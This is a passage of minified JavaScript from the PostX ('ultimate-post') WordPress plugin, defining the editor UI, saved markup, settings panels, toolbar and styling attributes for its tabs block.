ultp-arrow-active",onClick:()=>(we<xe&&xe>Ce&&fe(_e<Te?he+_e:he+Te),void(_e-he<Te&&se(!1))),ref:te},p.ZP.rightAngleBold)),(0,o.createElement)(v,{allowedBlocks:["ultimate-post/tab-item"],template:[["ultimate-post/tab-item",{tabIndex:"1",tabActive:!1,nav_text:"Tab 1",nav_desc:"Elevate your wardrobe with this timeless linen blazer, designed for both style."}],["ultimate-post/tab-item",{tabIndex:"2",tabActive:!0,nav_text:"Tab 2",nav_desc:"Elevate your wardrobe with this timeless linen blazer, designed for both style."}],["ultimate-post/tab-item",{tabIndex:"3",tabActive:!1,nav_text:"Tab 3",nav_desc:"Elevate your wardrobe with this timeless linen blazer, designed for both style."}]],renderAppender:!1})))))}const I=({navigationAttr:e})=>{const{titleTag:t,navDescription:l,navIcon:a,navTitle:i,setAttributes:n,chooseIcon:r,nav_text:s,id:c,nav_desc:u,nav_icon:d,setChildIcon:m,clientId:y}=e;return(0,o.createElement)(g,null,(0,o.createElement)("div",{className:"ultp-tab-title-content",draggable:"false"},a&&(d.length||r.length)?(0,o.createElement)("div",{className:"ultp-tabs-nav-icon"},p.ZP[d.length?d:r]):"",i&&(0,o.createElement)(f,{key:"editable",tagName:t,className:"ultp-tab-title",keeplaceholderonfocus:"true",placeholder:__("Tab Text...","ultimate-post"),onChange:e=>{P(c,{nav_text:e})},value:s})),l&&(0,o.createElement)(f,{key:"editable",tagName:"div",className:"ultp-tab-desc",keeplaceholderonfocus:"true",placeholder:__("Tab Desc...","ultimate-post"),onChange:e=>{P(c,{nav_desc:e})},value:u}))}},23232:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(87462),a=l(67294);const{InnerBlocks:i,useBlockProps:n}=wp.blockEditor;function r(e){const{blockId:t,advanceId:l,tabMainArr:r,chooseIcon:s,navIcon:p,activetab:c,tabMainData:u,titleTag:d,navDescription:m,navTitle:g,layout:y,tabFullWidth:b,tabArrowEnable:v,tabChange:h,initialOpen:f,tabResponsive:k,autoPlayDuration:w,enableProgressBar:x,stackOnMobile:T}=e.attributes,_=`${d}`,C=n.save({id:l||void 0,className:`ultp-block-${t}`});return(0,a.createElement)("div",(0,o.Z)({},C,{"data-tabevent":h,"data-activetab":f,"data-responsive":k,"data-duration":w,"data-progressbar":x}),(0,a.createElement)("div",{className:"ultp-block-wrapper"},(0,a.createElement)("div",{className:`ultp-tab-wrapper ultp-tab-${k} ultp-nav-${y} ultp-tab-${b?"fill-width":"full-width"} ultp-tab-arrow-${v?"on":"off"} ${T?" ultp-tab-mobile-stack":""}`},(0,a.createElement)("div",{className:"ultp-tabs-nav-wrapper"},(0,a.createElement)("span",{className:"ultp-tab-left-arrow"},"_ultp_tb_ic_leftAngleBold_ultp_tb_ic_end_"),(0,a.createElement)("div",{className:"ultp-tabs-nav-inner"},(0,a.createElement)("div",{className:"ultp-tabs-nav","data-tabnavigation":`.ultp-block-${t}`},u&&JSON.parse(u)?.length>0&&JSON.parse(u)?.map(((e,t)=>(0,a.createElement)("div",{className:"ultp-tabs-nav-element "+(e.tabIndex==f?"ultp-tab-active tab-progressbar-active":""),"data-tabIndex":e.tabIndex,key:e.tabIndex,"data-order":2*Number(e.tabIndex)-1},(0,a.createElement)("div",{className:"ultp-tab-title-content"},p&&s.length>0?(0,a.createElement)("div",{className:"ultp-tabs-nav-icon","data-animationduration":"400","data-headtext":e.nav_text},"_ultp_tb_ic_"+(e?.nav_icon?.length>0?e.nav_icon:s||"hamicon_3")+"_ultp_tb_ic_end_"):"",g&&(0,a.createElement)(_,{className:"ultp-tab-title",dangerouslySetInnerHTML:{__html:e.nav_text}})),m&&(0,a.createElement)("div",{className:"ultp-tab-desc",dangerouslySetInnerHTML:{__html:e.nav_desc}}),x&&(0,a.createElement)("span",{className:"tab-progressbar"})))))),(0,a.createElement)("span",{className:"ultp-tab-right-arrow"},"_ultp_tb_ic_rightAngleBold_ultp_tb_ic_end_")),(0,a.createElement)("div",{className:"ultp-tab-content"},(0,a.createElement)(i.Content,null)))))}},58207:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(53049),i=l(92637),n=l(43581);const{__}=wp.i18n,r=({store:e})=>{const{navDescription:t,navIcon:l,navTitle:r,tabMainData:s}=e.attributes,p=s&&JSON.parse(s).sort(((e,t)=>e.tabIndex-t.tabIndex)).map((e=>({value:e.tabIndex,label:__(e.nav_text,"ultimate-post")})));return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(n.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid9045",store:e}),(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"setting",title:__("Layout","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"layout",key:"layout",options:[{img:"assets/img/layouts/tab/tab_nav_top.png",value:"top"},{img:"assets/img/layouts/tab/tab_nav_bottom.png",value:"bottom"},{img:"assets/img/layouts/tab/tab_nav_right.png",value:"right",pro:!0},{img:"assets/img/layouts/tab/tab_nav_left.png",value:"left"}],label:__("Tab Direction","ultimate-post")}},{position:2,data:{type:"toggle",key:"tabFullWidth",label:__("Fill Container Width","ultimate-post")}},{position:3,data:{type:"toggle",key:"stackOnMobile",help:"Navigation Should be vertical on Mobile device",label:__("Stack on Mobile","ultimate-post")}},{position:4,data:{type:"alignment",key:"tabJustifyAlignment",disableJustify:!0,icons:["juststart","justcenter","justend","justbetween"],options:["flex-start","center","flex-end","space-between"],label:__("Justify Navigation","ultimate-post")}},{position:5,data:{type:"select",key:"initialOpen",options:p?.length>0?p:[],help:"Its working on Frontend Only",label:__("Initially Opened Tab","ultimate-post")}},{position:7,data:{type:"toggle",key:"navTitle",label:__("Title","ultimate-post")}},{position:8,data:{type:"toggle",key:"navIcon",label:__("Icon","ultimate-post")}},{position:9,data:{type:"toggle",key:"navDescription",label:__("Description","ultimate-post")}},{position:6,data:{type:"select",key:"tabChange",options:[{value:"click",label:__("On Click","ultimate-post")},{value:"mouseenter",label:__("On Hover","ultimate-post")},{value:"autoplay",pro:!0,label:__("Autoplay","ultimate-post")}],label:__("Tab Change","ultimate-post")}},{position:10,data:{type:"alignment",key:"navContentAlignment",disableJustify:!0,label:__("Items Alignment","ultimate-post")}},{position:11,data:{type:"range",key:"autoPlayDuration",min:0,max:10,step:.5,label:__("Duration","ultimate-post")}},{position:12,data:{type:"toggle",key:"enableProgressBar",label:__("Progress Bar","ultimate-post")}},{position:13,data:{type:"color2",key:"barBgColor",responsive:!0,unit:!0,label:__("Progress Bar Color","ultimate-post")}},{position:14,data:{type:"range",key:"barBgSize",responsive:!0,unit:!1,label:__("Progress Bar Size","ultimate-post")}}],initialOpen:!0,store:e}),(0,o.createElement)(a.T,{title:__("Tab Navigation Style","ultimate-post"),include:[{position:1,data:{type:"toggle",key:"tabArrowEnable",label:__("Tab Arrow/Caret","ultimate-post")}},{position:2,data:{type:"range",key:"navGap",min:0,max:300,step:1,responsive:!0,unit:!0,label:__("Gap between Tab Navigation","ultimate-post")}},{position:3,data:{type:"range",key:"navMinWidth",min:1,max:600,step:1,responsive:!0,unit:!0,label:__("Tab Navigation Minimum Width","ultimate-post")}},{position:4,data:{type:"range",key:"navMaxWidth",min:1,max:900,step:1,responsive:!0,unit:!0,label:__("Tab Navigation Minimum Width","ultimate-post")}},{position:4,data:{type:"tab",key:"navTab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color2",key:"navBg",label:__("Background Color","ultimate-post")},{type:"border",key:"navBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"navRadius",responsive:!0,unit:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"navShadow",label:__("Box Shadow","ultimate-post")}]},{name:"hover",title:__("Hover/Active","ultimate-post"),options:[{type:"color2",key:"navHoverBg",label:__("Background Color","ultimate-post")},{type:"border",key:"navHoverBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"navHoverRadius",responsive:!0,unit:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"navHoverShadow",label:__("Box Shadow","ultimate-post")}]}]}},{position:5,data:{type:"dimension",key:"navPadding",responsive:!0,unit:!0,label:__("Padding","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Title/icon/description Style","ultimate-post"),include:[{position:1,data:{type:"tab",key:"navContentTab",content:[r&&{name:"title",title:__("Title","ultimate-post"),options:[{type:"tag",key:"titleTag",label:__("Title Tag","ultimate-post"),options:[{value:"h1",label:"H1"},{value:"h2",label:"H2"},{value:"h3",label:"H3"},{value:"h4",label:"H4"},{value:"h5",label:"H5"},{value:"h6",label:"H6"},{value:"span",label:"span"},{value:"p",label:"p"}]},{type:"typography",key:"titleTypo",label:__("Title Typography","ultimate-post")},{type:"color",key:"titleColor",label:__("Title Color","ultimate-post")},{type:"color",key:"titleHoverColor",label:__("Title Hover/Active Color","ultimate-post")}]},l&&{name:"icon",title:__("Icon","ultimate-post"),options:[{type:"select",key:"iconPosition",options:[{value:"left",label:__("Left of Title","ultimate-post")},{value:"right",label:__("Right of Title","ultimate-post")},{value:"top",label:__("Top of Title","ultimate-post")}],label:__("Icon Position","ultimate-post")},{type:"icon",key:"chooseIcon",label:__("Choose Icon","ultimate-post")},{type:"range",key:"iconSize",responsive:!0,unit:!0,min:1,max:150,step:1,label:__("Icon Size","ultimate-post")},{type:"range",key:"titleIconGap",min:0,max:300,step:1,responsive:!0,unit:!0,label:__("Gap with Title","ultimate-post")},{type:"color",key:"iconColor",label:__("Icon Color","ultimate-post")},{type:"color",key:"iconHoverColor",label:__("Icon Hover/Active Color","ultimate-post")}]},t&&{name:"description",title:__("Description","ultimate-post"),options:[{type:"typography",key:"descTypo",label:__("Description Typography","ultimate-post")},{type:"range",key:"descGapTitle",min:0,max:300,step:1,responsive:!0,unit:!0,label:__("Gap with Title","ultimate-post")},{type:"color",key:"descColor",label:__("Description Color","ultimate-post")},{type:"color",key:"descHoverColor",label:__("Description Hover Color","ultimate-post")}]}]}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Tab Content/Body","ultimate-post"),include:[{position:1,data:{type:"range",key:"tabBodyGap",min:0,max:300,step:1,responsive:!0,unit:!0,label:__("Tab From Tab Menu","ultimate-post")}},{position:2,data:{type:"range",key:"tabBodyMinHeight",min:1,max:900,step:1,responsive:!0,unit:!0,label:__("Tab Content Minimum Height","ultimate-post")}},{position:3,data:{type:"color2",key:"tabBodyBg",label:__("Background Color","ultimate-post")}},{position:4,data:{type:"border",key:"tabBodyBorder",label:__("Border","ultimate-post")}},{position:5,data:{type:"dimension",key:"tabBodyRadius",responsive:!0,unit:!0,label:__("Border Radius","ultimate-post")}},{position:6,data:{type:"boxshadow",key:"tabBodyShadow",label:__("Box Shadow","ultimate-post")}},{position:7,data:{type:"dimension",key:"tabBodyMargin",responsive:!0,unit:!0,label:__("Margin","ultimate-post")}},{position:8,data:{type:"dimension",key:"tabBodyPadding",responsive:!0,unit:!0,label:__("Padding","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Navigation Bar Background","ultimate-post"),include:[{position:1,data:{type:"color2",key:"navWrapBg",label:__("Navigation Background","ultimate-post")}},{position:2,data:{type:"border",key:"navWrapBorder",label:__("Border","ultimate-post")}},{position:3,data:{type:"dimension",key:"navWrapRadius",responsive:!0,unit:!0,label:__("Border Radius","ultimate-post")}},{position:4,data:{type:"dimension",key:"navWrapPadding",responsive:!0,unit:!0,label:__("Padding","ultimate-post")}},{position:5,data:{type:"dimension",key:"navWrapMargin",responsive:!0,unit:!0,label:__("Margin","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Tab Responsive","ultimate-post"),include:[{position:1,data:{type:"select",key:"tabResponsive",options:[{value:"normal",label:__("Normal","ultimate-post")},{value:"slider",label:__("Slider","ultimate-post")},{value:"accordion",label:__("Accordion","ultimate-post")}],label:__("Responsive Style","ultimate-post")}},{position:2,data:{type:"range",key:"tabSliderArrowSize",min:1,max:300,step:1,responsive:!0,unit:!0,label:__("Arrow Icon Size","ultimate-post")}},{position:3,data:{type:"color",key:"tabSliderArrowColor",label:__("Slider Arrow Color","ultimate-post")}},{position:4,data:{type:"color2",key:"tabSliderArrowBg",label:__("Slider Arrow Background","ultimate-post")}}],initialOpen:!1,store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:e}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))),(0,a.dH)())}},80518:(e,t,l)=>{"use strict";l.d(t,{Z:()=>u});var o=l(67294),a=l(53049),i=l(59902),n=l(87763),r=l(64766);const{__}=wp.i18n,{Dropdown:s,ToolbarButton:p,ToolbarGroup:c}=wp.components,u=({store:e,handleAddNewTab:t})=>{const[l,u]=(0,i.Z)();return(0,o.createElement)("div",{className:"ultp-tab-toolbar"},(0,o.createElement)(c,null,(0,o.createElement)(p,{className:"ultp-gallery-toolbar-group ultp-menu-toolbar-group"},(0,o.createElement)(a.lj,{store:e,attrKey:"navContentAlignment",options:a.M9,label:__("Alignment","ultimate-post")}))),(0,o.createElement)(s,{contentClassName:"ultp-tab-toolbar-drop",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,o.createElement)(p,{label:"Spacing",icon:n.Z.spacing,onClick:()=>e()}),renderContent:({onClose:t})=>(0,o.createElement)(a.df,{title:!1,include:[{position:1,data:{type:"range",key:"navGap",min:1,max:300,step:1,responsive:!0,unit:!0,label:__("Gap between Tab Navigation","ultimate-post")}},{position:5,data:{type:"range",key:"tabBodyGap",min:1,max:300,step:1,responsive:!0,unit:!0,label:__("Tab From Tab Menu","ultimate-post")}}],initialOpen:!0,store:e})}),(0,o.createElement)(s,{contentClassName:"ultp-tab-toolbar-drop",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,o.createElement)(p,{label:"Style",icon:n.Z.styleIcon,onClick:()=>e()}),renderContent:({onClose:t})=>(0,o.createElement)(a.df,{title:!1,include:[{position:1,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"titleColor",label:__("Title Color","ultimate-post")},{type:"color",key:"iconColor",label:__("Icon Color","ultimate-post")},{type:"color2",key:"navBg",label:__("Background Color","ultimate-post")},{type:"border",key:"navBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"navRadius",responsive:!0,unit:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"navShadow",label:__("Box Shadow","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"titleHoverColor",label:__("Title Hover/Active Color","ultimate-post")},{type:"color",key:"iconHoverColor",label:__("Icon Hover/Active Color","ultimate-post")},{type:"color2",key:"navHoverBg",label:__("Background Color","ultimate-post")},{type:"border",key:"navHoverBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"navHoverRadius",responsive:!0,unit:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"navHoverShadow",label:__("Box Shadow","ultimate-post")}]}]}},{position:5,data:{type:"dimension",key:"navPadding",responsive:!0,unit:!0,label:__("Padding","ultimate-post")}}],initialOpen:!0,store:e})}),(0,o.createElement)(s,{contentClassName:"ultp-tab-toolbar-drop",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,o.createElement)("span",{className:"ultp-tab-toolbar-icon"},(0,o.createElement)(p,{label:"Typography",icon:n.Z.typography,onClick:()=>e()})),renderContent:({onClose:t})=>(0,o.createElement)(a.df,{title:!1,include:[{position:1,data:{type:"typography",key:"titleTypo",label:__("Title Typography","ultimate-post")}},{position:5,data:{type:"typography",key:"descTypo",label:__("Description Typography","ultimate-post")}}],initialOpen:!0,store:e})}),(0,o.createElement)(s,{contentClassName:"ultp-tab-toolbar-drop",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,o.createElement)("span",{className:"ultp-tab-toolbar-icon"},(0,o.createElement)(p,{label:"Icon Style",icon:r.ZP.five_star_line,onClick:()=>e()})),renderContent:({onClose:t})=>(0,o.createElement)(a.df,{title:!1,include:[{position:1,data:{type:"toggle",key:"navIcon",label:__("Icon","ultimate-post")}},{position:5,data:{type:"select",key:"iconPosition",options:[{value:"left",label:__("Left of Title","ultimate-post")},{value:"right",label:__("Right of Title","ultimate-post")},{value:"top",label:__("Top of Title","ultimate-post")}],label:__("Icon Position","ultimate-post")}},{position:10,data:{type:"icon",key:"chooseIcon",label:__("Choose Icon","ultimate-post")}},{position:15,data:{type:"range",key:"iconSize",responsive:!0,unit:!0,min:1,max:150,step:1,label:__("Icon Size","ultimate-post")}},{position:20,data:{type:"range",key:"titleIconGap",min:1,max:300,step:1,responsive:!0,unit:!0,label:__("Gap with Title","ultimate-post")}},{position:25,data:{type:"color",key:"iconColor",label:__("Icon Color","ultimate-post")}},{position:30,data:{type:"color",key:"iconHoverColor",label:__("Icon Hover/Active Color","ultimate-post")}}],initialOpen:!0,store:e})}),(0,o.createElement)(c,null,(0,o.createElement)(p,{label:"Add Tab",onClick:()=>t()},(0,o.createElement)("div",{className:"ultp-menu-toolbar-add-item ultp-tab-toolbar-add-item"},r.ZP.plus,(0,o.createElement)("div",{className:"__label"},__("Add Tab","ultimate-post"))))))}},20641:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={tabMainArr:{type:"string",default:'[{"nav_id":1,"container_id":1,"nav_text":"Nav Item 1","active":true},{"nav_id":2,"container_id":2,"nav_text":"Nav Item 2","active":false},{"nav_id":3,"container_id":2,"nav_text":"Nav Item 3","active":false}]'},tabMainData:{type:"string",default:""},blockId:{type:"string",default:""},previewImg:{type:"string",default:""},editorSelectedTab:{type:"string",default:"0"},tabItems:{type:"string",default:"[]"},defaultOpenTab:{type:"string",default:"0"},layout:{type:"string",default:"top"},tabFullWidth:{type:"boolean",default:!1,style:[{depends:[{key:"tabResponsive",condition:"!=",value:"slider"},{key:"layout",condition:"==",value:"top"}]},{depends:[{key:"tabResponsive",condition:"!=",value:"slider"},{key:"layout",condition:"==",value:"bottom"}]}]},stackOnMobile:{type:"boolean",default:!1,style:[{depends:[{key:"stackOnMobile",condition:"==",value:!0},{key:"tabResponsive",condition:"!=",value:"accordion"},{key:"layout",condition:"==",value:"left"}]},{depends:[{key:"stackOnMobile",condition:"==",value:!0},{key:"tabResponsive",condition:"!=",value:"accordion"},{key:"layout",condition:"==",value:"right"}]},{depends:[{key:"stackOnMobile",condition:"==",value:!1},{key:"tabResponsive",condition:"!=",value:"accordion"},{key:"layout",condition:"==",value:"left"}]},{depends:[{key:"stackOnMobile",condition:"==",value:!1},{key:"tabResponsive",condition:"!=",value:"accordion"},{key:"layout",condition:"==",value:"right"}]}]},tabJustifyAlignment:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"!=",value:"left"},{key:"layout",condition:"!=",value:"right"},{key:"tabResponsive",condition:"!=",value:"normal"},{key:"tabResponsive",condition:"!=",value:"slider"},{key:"tabFullWidth",condition:"!=",value:!0}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] { justify-content:{{tabJustifyAlignment}}; }'},{depends:[{key:"layout",condition:"!=",value:"left"},{key:"layout",condition:"!=",value:"right"},{key:"tabResponsive",condition:"==",value:"normal"},{key:"tabResponsive",condition:"!=",value:"slider"},{key:"tabFullWidth",condition:"!=",value:!0}],selector:"{{ULTP}} > .ultp-block-wrapper .ultp-tab-normal .ultp-tabs-nav-wrapper { justify-content:{{tabJustifyAlignment}}; }"}]},initialOpen:{type:"string",default:"1"},tabChange:{type:"string",default:"click"},navTitle:{type:"boolean",default:!0},navIcon:{type:"boolean",default:!1},navDescription:{type:"boolean",default:!1},activetab:{type:"string",default:"0"},navContentAlignment:{type:"string",default:"left",style:[{depends:[{key:"navContentAlignment",condition:"==",value:"center"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element { text-align: {{navContentAlignment}}; } \n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content { justify-content: center; align-items: center !important;}'},{depends:[{key:"navContentAlignment",condition:"==",value:"left"},{key:"iconPosition",condition:"!=",value:"top"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element { text-align: {{navContentAlignment}}; } \n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content { justify-content: flex-start; align-items:  center; }'},{depends:[{key:"navContentAlignment",condition:"==",value:"left"},{key:"iconPosition",condition:"==",value:"top"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element { text-align: {{navContentAlignment}}; } \n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content { justify-content: flex-start; align-items: flex-start; }'},{depends:[{key:"navContentAlignment",condition:"==",value:"right"},{key:"iconPosition",condition:"!=",value:"top"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element { text-align: {{navContentAlignment}}; } \n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content { justify-content: flex-end; align-items: flex-end !important; }'},{depends:[{key:"navContentAlignment",condition:"==",value:"right"},{key:"iconPosition",condition:"==",value:"top"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element { text-align: {{navContentAlignment}}; } \n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content { justify-content: flex-end; align-items: flex-end !important; }'}]},tabArrowEnable:{type:"boolean",default:!0,style:[{depends:[{key:"tabArrowEnable",condition:"==",value:!1}]},{depends:[{key:"tabArrowEnable",condition:"==",value:!0}]},{depends:[{key:"tabArrowEnable",condition:"==",value:!0},{key:"layout",condition:"==",value:"left"}],selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-nav-right>.ultp-tabs-nav-wrapper>.ultp-tabs-nav-inner { padding-left: 10px; } \n                {{ULTP}} > .ultp-block-wrapper > .ultp-nav-left>.ultp-tabs-nav-wrapper>.ultp-tabs-nav-inner { padding-right: 10px; }\n                {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-right-arrow { left: calc( 50% + 0px );  } \n                {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-left-arrow { left: calc( 50% + 0px ); }\n                "},{depends:[{key:"tabArrowEnable",condition:"==",value:!0},{key:"layout",condition:"==",value:"right"}],selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-nav-right>.ultp-tabs-nav-wrapper>.ultp-tabs-nav-inner { padding-left: 10px; } \n                {{ULTP}} > .ultp-block-wrapper > .ultp-nav-left>.ultp-tabs-nav-wrapper>.ultp-tabs-nav-inner { padding-right: 10px; }\n                {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-right-arrow { left: calc( 50% + 10px );  } \n                {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-left-arrow { left: calc( 50% + 10px ); }\n                "}]},navGap:{type:"object",default:{lg:"10",unit:"px"},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"], .postx-page {{ULTP}} > .ultp-block-wrapper > .ultp-tab-accordion > .ultp-tabs-nav-wrapper  { gap:{{navGap}}; }'}]},navMinWidth:{type:"object",default:{lg:"115",unit:"px"},style:[{depends:[{key:"layout",condition:"==",value:"top"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element { min-width:{{navMinWidth}}; }'},{depends:[{key:"layout",condition:"==",value:"bottom"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element { min-width:{{navMinWidth}}; }'}]},navMaxWidth:{type:"object",default:{lg:"300",unit:"px"},style:[{depends:[{key:"layout",condition:"==",value:"left"}],selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper { max-width:{{navMaxWidth}}; }"},{depends:[{key:"layout",condition:"==",value:"right"}],selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper { max-width:{{navMaxWidth}}; }"}]},navBg:{type:"object",default:{openColor:1,type:"color",color:"#E6E6E6"},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element,\n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element::after'}]},navBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element'}]},navRadius:{type:"object",default:{lg:{top:"4",bottom:"4",left:"4",right:"4",unit:"px"}},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element { border-radius:{{navRadius}}; }'}]},navShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element'}]},navHoverBg:{type:"object",default:{openColor:1,type:"color",color:"#2E2E2E"},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element:hover, \n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element.ultp-tab-active,\n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element:hover::after,\n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tab-active.ultp-tabs-nav-element::after'}]},navHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element:hover, \n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element.ultp-tab-active'}]},navHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element:hover, \n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element.ultp-tab-active { border-radius:{{navHoverRadius}}; }'}]},navHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element:hover, \n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element.ultp-tab-active'}]},navPadding:{type:"object",default:{lg:{top:"12",bottom:"12",left:"32",right:"32",unit:"px"}},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element, \n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element.ultp-tab-active { padding: {{navPadding}}; }'}]},titleTag:{type:"string",default:"h4"},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"16",unit:"px"},height:{lg:"24",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{depends:[{key:"navTitle",condition:"==",value:!0}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > div > .ultp-tab-title'}]},titleColor:{type:"string",default:"#070707",style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > div > .ultp-tab-title { color: {{titleColor}};}'}]},titleHoverColor:{type:"string",default:"#fff",style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element:hover > div > .ultp-tab-title, \n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element.ultp-tab-active > div > .ultp-tab-title { color: {{titleHoverColor}}; }'}]},iconPosition:{type:"string",default:"left",style:[{depends:[{key:"iconPosition",condition:"==",value:"left"}]},{depends:[{key:"iconPosition",condition:"==",value:"right"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content > .ultp-tabs-nav-icon { order: 2; }'},{depends:[{key:"iconPosition",condition:"==",value:"top"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content { flex-direction: column; align-items: flex-start;}'}]},chooseIcon:{type:"string",default:"rightArrowLg"},iconSize:{type:"object",default:{lg:"20",unit:"px"},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content > .ultp-tab-icon-dropdown > .ultp-tabs-nav-icon > svg,\n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content > .ultp-tabs-nav-icon > svg { height:{{iconSize}}; width:{{iconSize}}; }'}]},titleIconGap:{type:"object",default:{lg:"8",unit:"px"},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content { gap:{{titleIconGap}}; 